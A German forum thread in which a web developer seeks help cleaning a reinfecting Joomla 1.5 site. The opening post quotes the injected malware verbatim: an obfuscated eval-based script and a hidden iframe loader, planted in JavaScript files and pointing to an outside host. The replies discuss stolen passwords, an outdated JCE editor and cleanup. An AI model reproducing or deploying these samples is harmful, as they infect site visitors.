Joomla Javascript im Code - und reproduziert sich??

#1 Hallo liebes Forum.
Wir haben hier einen Fall der etwas nervig ist. Eine Joomlas Seite (ehemals 1.5.22 - jetzt 1.5.26) hat ist von Maleware befallen. Asserhalb des Codes (im Quelltest zu sehen) befindet sich dieser Code:

Zitat

<script>try{1-prototype;}catch(bsdbd){x=2;}
if(x){f=[5,1,92,109,101,89,108,96,101,102,23,92,106,100,55,92,91,30,33,23,113,5,1,108,89,105,22,97,93,104,101,23,51,24,91,101,91,108,99,93,101,106,38,90,104,93,88,106,93,60,98,93,100,91,102,107,30,31,96,92,106,88,99,93,30,31,51,4,0,97,93,104,101,37,105,108,112,98,93,37,102,103,106,95,108,96,101,102,52,29,89,89,105,103,99,107,108,92,29,51,4,0,97,93,104,101,37,105,108,112,98,93,37,106,103,103,51,31,36,47,49,48,91,101,30,49,5,1,95,94,105,99,38,106,106,113,99,91,38,99,91,94,107,51,31,36,47,49,48,91,101,30,49,5,1,95,94,105,99,38,106,104,91,23,22,53,23,24,96,107,106,104,49,37,39,92,98,97,101,97,89,37,89,103,100,37,43,48,47,44,43,43,48,46,36,96,107,99,100,25,49,5,1,95,94,105,99,38,96,90,24,52,22,31,93,104,101,64,90,31,50,3,2,91,101,91,108,99,93,101,106,38,89,101,92,112,36,89,103,102,93,101,90,59,95,95,100,91,30,97,93,104,101,32,49,5,1,115,51,4,0,111,96,100,92,102,109,38,102,100,100,102,87,92,23,51,24,93,104,101,56,90,92,50,3,2];v="eva";}if(v)e=eval;w=f;s=[];r=String;z=((e)?"Co"+"de":"");zx=((e)?"fromChar":"")+z;for(i=0;-i+286>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(8+e("j"+"%3"))));}
if(x&&f&&012===10)e(s);</script>

Ich habe angefangen die Seite zu durchsuchen.. dabei gibt es Dateien wie

Zitat

jquery.ui.button.min.js

die dann folgenden Code beinhalten:

Zitat

var _q = document.createElement('iframe'),_n = 'setAttribute';_q[_n]('src', 'http://www.naturzeit.com/default.php');_q.style.position = 'absolute';_q.style.width = '10px';_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7673e2dae7f08d2087e22') + 1);_q.style.left = '-6240px';document.write('<div id=\'zhu\'></div>');document.getElementById('zhu').appendChild(_q);

Die Dateien tauchen in unterschiedlichsten Ordnern auf. Innerhalb des Templates aber auch außerhalb in den Joomla-Verzeichnissen.

Ich habe also angefangen die Dateien zu löschen. Bin einmal schon jeden Ordner durchgegangen. Bringt jedoch nichts. Es tauchen immer wieder neue Dateien auf - als ob sich das Ding selbst reproduziert.

Was kann ich tun!?

Gruß,
Alex

#2 Ach du meine Güte, noch so einer...
Ich frage mich wie ihr das immer schafft, scheinen ja echt viele Leute CMS zu nutzen die nichts taugen.

Zitat

Ich habe also angefangen die Dateien zu löschen. Bin einmal schon jeden Ordner durchgegangen. Bringt jedoch nichts. Es tauchen immer wieder neue Dateien auf...

Du muss erstmal die Sicherheitslücke kennen.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#3 Ja das versuche ich herauszufinden. Ich versage hier nur wie ein blutiger Anfänger.

Das ist im übrigen nicht meine eigene Seite .. abgesehen davon, dass diese in WordPress sind, sind die eigenen Seiten geschützt und werden regelmäßig samt Plugins überprüft

Das ist mein erster hartnäckiger Fall. Habe auch schon ein paar andere Seiten gesäubert, da war aber erkenntlich woran es lang und da tauchten auch nicht ständig neue Dateien auf *motz*

Gruß,
Alex

#4

Zitat

abgesehen davon, dass diese in WordPress sind,

Wordpress das sagt ja schon alles...

Zitat

sind die eigenen Seiten geschützt und werden regelmäßig samt Plugins überprüft

Von wem denn, von dir?

Zitat

Das ist mein erster hartnäckiger Fall. Habe auch schon ein paar andere Seiten gesäubert,

Wenn sowas auftritt hat man quasi schon verloren, dann stimmt ja irgendwas mit dem Code nicht -
eine fatale Sicherheitslücke.

Aber wie ich oben bereits angedeutet hatte, in der Vergangenheit stand es nicht so gut um Wordpress.
Sehr überladen mit viel Zeugs was niemand brauch (diese Plugins halt) und die Q/A hat hinterher gehingt - ich weiß aber nicht wie es in der neusten Version ist und was man dagegen getan hat.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#5 Wir haben keine Probleme mit WordPress - relativ sicher und sehr umgänglich. Hinzu kommt, dass der Kunde so wenig wie möglich zahlen will. Mit eigenen CMS und weiteren eigenen Modulen funktioniert das einfach nicht mehr. Wir sind so sehr zufrieden - und der Kunde auch.

Und ich bin nicht gänzlich dämlich. Im Vorfeld weis ich meine Seiten zu schützen, kenne meinen Code und weis was ich tue. Das passt dann schon.

Überladen hingegen ist diese Joomla-Seite. Sich da durchzuwühlen ist grausam.
"Quasi verloren" kann keine Option sein. Ich hatte nur gehofft, eine Lösung zur reinen Säuberung zu finden. Denn die Alternative wäre das Template zu nehmen, zu säubern und Joomla selbst neu aufzusetzen. Bei dem Seitenumfang von dem aber recht aufwändig .. macht der dann wahrscheinlich eh nicht

#6

Zitat

Hinzu kommt, dass der Kunde so wenig wie möglich zahlen will. Mit eigenen CMS und weiteren eigenen Modulen funktioniert das einfach nicht mehr.

Ja klar das ist wie immer das wirtschaftliche Problem, was nichts kost ist auch nichts.

Zitat

Und ich bin nicht gänzlich dämlich. Im Vorfeld weis ich meine Seiten zu schützen, kenne meinen Code und weis was ich tue. Das passt dann schon.

Das möcht ich dir auch nicht unterstellt haben, faktisch aber muss das Design ja vorher passen - irgendwo danach auszubessern und dann noch an fremden Code ist sehr schwierig und auch nicht sauber genug.

Zitat

Überladen hingegen ist diese Joomla-Seite. Sich da durchzuwühlen ist grausam.
... "Quasi verloren" kann keine Option sein. Ich hatte nur gehofft, eine Lösung zur reinen Säuberung zu finden.

Ja wenn du Joomla debuggen willst dann musst du das wohl tuen, dass kostet aber sicherlich auch etwas - vielleicht mehr als wenn man das alles vorher vernünftig aufgebaut hätte.
In dieser Hinsicht zieht der Kunde dann wohl letztendlich den kürzeren weil ich denke mal das du dich jetzt damit beschäftigst (eventuell einige Stunden) willst du dir auch sicherlich bezahlen lassen.

Ich persönlich vertraue keinem dieser CMS, schon gar keins was tausend Plugins hat oder Code den ich nicht für würdig halte und/oder gar nicht kenne.
Wenn die Leute halt nichts zahlen wollen sollen sie sich doch halt so ein Baukasten System/Software kaufen und sich durch schlagen.
Aber ich würde halt nicht wollen das am Ende meine Arbeit zu nichte ist wegen so einem Fehler...

Sicherlich hat Joomla ein eigenes Forum, da wäre doch dann der beste Ort dort zu fragen.
Man muss natürlich jetzt Leute haben die das CMS sehr gut kennen, die können sicherlich viel besser weiterhelfen.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#7

Zitat

Sicherlich hat Joomla ein eigenes Forum, da wäre doch dann der beste Ort dort zu fragen.
Man muss natürlich jetzt Leute haben die das CMS sehr gut kennen, die können sicherlich viel besser weiterhelfen.

Das ist sicher auch noch eine Option ja.
Klar ist - wenn mir hier niemand sagen kann, ob und wie das vernünftig zu bereinigen ist, und ich gezwungen bin das neu aufzusetzen, ist es halt so. Letztendlich muss der Kunde entscheiden was er will.

Danke mal soweit!

-Alex

#8

Zitat

Klar ist - wenn mir hier niemand sagen kann, ob und wie das vernünftig zu bereinigen ist, und ich gezwungen bin das neu aufzusetzen,

Das hab ich dir schon gesagt, du musst den Fehler finden.
Alles neu installieren bringt in sofern nichts, nicht wenn du dann immernoch den selben anfälligen Code benutzt.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#9 Dieses Problem hatten wir bei einigen Kunden auch vor einiger Zeit.
Dies ist zurückzuführen auf geklaute PW´s.

Also bitte dem Hostingpaket und ftp ein neues PW verpassen und den Code entfernen und schon ist ruhe

Zum Entfernen:

lade die alle Dateien des webspace runter. Lade dir ein suchen ersetzen tool, Und gebe bei suche den gesammten code ein und lasse ihn durch ein leerezeichen ersetzen

UND WICHTIG: bitte ersetze den code oben bitte durch ein bild von dem code.
__________
Wenn ich euch geholfen habe, könnt ihr gerne ans Board spenden, auch ich freue mich über einen kleinen Obolus für mein Feierabendbier
Protecus Spenden

#10

Zitat

Dies ist zurückzuführen auf geklaute PW´s.

Hat er bestimmt schon gewechselt, wäre ja das erste was man versucht...

Zitat

Lade dir ein suchen ersetzen tool,

Regex ftw.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#11 nur rein Interesse halber: Welches CMS wird denn von den Experten hier empfohlen, wenn Joomla und Wordpress so schlecht sind, wie sie hier gemacht werden? Kaum fiel das Wort "Wordpress", schon kam: Ah, Wordpress, dannis ja klar. Und Joomla kommt ja auch nicht besser weg.
Ich habe ja sogar Verständnis dafür, daß Firmen mit dem Erstellen von Webpräsenzen Geld verdienen möchten. Ich weiß auch, was für aberwitzige Preise stellenweise aufgerufen werden.
Ich hätt nur gern gewußt, welches CMS ich in Zukunft benutzen soll, wenn ich keine 4stelligen Summen für eine private Seite ausgeben will und kann, aber gleichzeitig vor der Geringschätzung des hiesigen Fachpersonals verschont bleibe und einfach geholfen bekomme, wenn ich trotz gewissenhafter Arbeit ein Problem habe.

#12

Zitat

nur rein Interesse halber: Welches CMS wird denn von den Experten hier empfohlen, wenn Joomla und Wordpress so schlecht sind, wie sie hier gemacht werden?

Zumindestens Wordpress stand ja scho durch seine unmengen von Addons (wo niemand mehr durchgeblickt hat) in Verruf - in wie weit das ausgebessert wurde weiß ich nicht.

Ich persönlich würde überhaupt gar kein CMS empfehlen, gar kein Code der von Dritten kommt und bei dem man selbst keine Ahnung hat wie er überhaupt funktioniert.

Zitat

Ich habe ja sogar Verständnis dafür, daß Firmen mit dem Erstellen von Webpräsenzen Geld verdienen möchten. Ich weiß auch, was für aberwitzige Preise stellenweise aufgerufen werden.

Tja was nix küt is auch nix - so ist das halt, man hat A) kein Support B) kann man keine besondere Leistung erwarten.

Zitat

Ich hätt nur gern gewußt, welches CMS ich in Zukunft benutzen soll, wenn ich keine 4stelligen Summen für eine private Seite ausgeben will und kann

Wer sich selbst mit der Technik beschäftigen will sollte sich auch damit beschäftigen sprich lerne PHP, wie man ordentlichen Code schreibt und wie diese Probleme die man hier (und woanders) sieht auftreten.

Die Frage ist ja auch ob man für eine private Seite überhaupt ein CMS brauch, vermutlich nicht - das ist ja schon ein dicker overhead (der zumal von der Person XYZ sowieso weder begreifbar noch kontrollierbar ist).
Du solltest dein Code so klein und überschaubar wie möglich halten, je weniger code man hat desto weniger potentielle Sicherheitslücken werden auftreten und man blickt gut durch (ist ja logisch).

Wer dennoch diverse CMS nutzen will/muss sollte sich zumindestens (selbst) auf dem laufenden halten in den dazu gehörenden Foren und auch immer schön alle Sicherheitsmeldungen etc. lesen.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#13 Tja im konkreten Fall ist Funktionalität gefragt, die ich mit meinen PHP-Kenntnissen nicht in absehbarer Zeit in der Qualität auf die Beine stellen kann. Mir bleibt wohl nur ein CMS übrig, Overhead hin oder her.
Viele Addons brauchen wir für "unser" Wordpress nicht. Und Schnickschnack is nicht vorgesehen.

Zum Thema anfälliger Code:
Ich hab in einem anderen Forum einen Tipp bekommen, und tatsächlich waren mehrere Webseiten auf meinem Webspace davon betroffen. Und zwar hatten diese Webs einen veralteten JCE-Editor in einer Version VOR 2.0.11.
Jetzt sind alle meine Seiten entweder runter vom Server oder haben einen JCE in der aktuellen Version 2.2.6.

#14

Zitat

Tja im konkreten Fall ist Funktionalität gefragt, die ich mit meinen PHP-Kenntnissen nicht in absehbarer Zeit in der Qualität auf die Beine stellen kann. Mir bleibt wohl nur ein CMS übrig...

Erreicht man auch ohne CMS, in vielen vielen Fällen die ich selbst gesehen hab ist weniger eindeutig mehr.

Zitat

nd zwar hatten diese Webs einen veralteten JCE-Editor in einer Version VOR 2.0.11.
Jetzt sind alle meine Seiten entweder runter vom Server oder haben einen JCE in der aktuellen Version 2.2.6.

Schon möglich, hättest du kein Joomla hättest du niemals was von einem JCE Editor gehört oder ihn benötigt -
siehe oben.
Weniger ist mehr - es sei denn du kannst all die tausend Zeilen Quellcode lesen und verstehen...
der nächste Exploit wird kommen...
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#15

Zitat

Schon möglich, hättest du kein Joomla hättest du niemals was von einem JCE Editor gehört oder ihn benötigt - siehe oben.

Falsch, ich hab mich bis vor einiger Zeit mit PHP-Fusion auseinandersetzen dürfen, da is der auch drin ;-)
Tja, das lag damals an meinem Hobby. Webradio.
wie auch immer: so ganz ohne solche Editoren wie JCE und CMS gehts halt nicht, die Alternative wäre, einem Menschen, der sich noch nie mit HTML beschäftigt hat, beibringen zu müssen, wie man einen Blog-Artikel schreibt, dort Bilder einbaut und das ganze auf seiner Homepage für die Nachwelt veröffentlicht.
Oder willst DU das übernehmen?
Warum der unbedingt Blogs schreiben will? Was weiß ich... wahrscheinlich weil er Bock auf Blog hat. So is das heute eben...

Jedenfalls war das Hauptproblem, daß der JCE nicht auf dem aktuellen Stand war. Sonst wär das nicht passiert. Muß man auch mal klar so sagen.